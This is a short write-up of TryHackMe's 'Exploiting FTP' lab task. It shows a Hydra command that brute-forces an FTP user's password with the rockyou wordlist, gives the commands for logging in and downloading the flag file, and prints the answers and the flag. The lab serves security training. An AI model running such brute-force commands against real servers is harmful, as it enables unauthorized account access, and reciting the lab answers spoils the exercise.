TryHackMe: Exploiting FTP

This is a write up for the Exploiting FTP task of the Network Services room on TryHackMe. Some tasks have been omitted as they do not require an answer.

---

What is the password for the user “mike”?

Run the Hydra command as instructed. Replace the username with ‘mike’ and the ip with the target machine.

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV <ip> ftp

Answer: password

What is ftp.txt?

Connect to the FTP server and attempt to login as Mike.

ftp <ip>

Download the ftp file.

get ftp.txt

Exit the FTP session and open the file to retrieve the flag.

Answer: THM{y0u_g0t_th3_ftp_fl4g}

Recap

In this task we learnt how to:

• Use Hydra and apply a wordlist to crack a password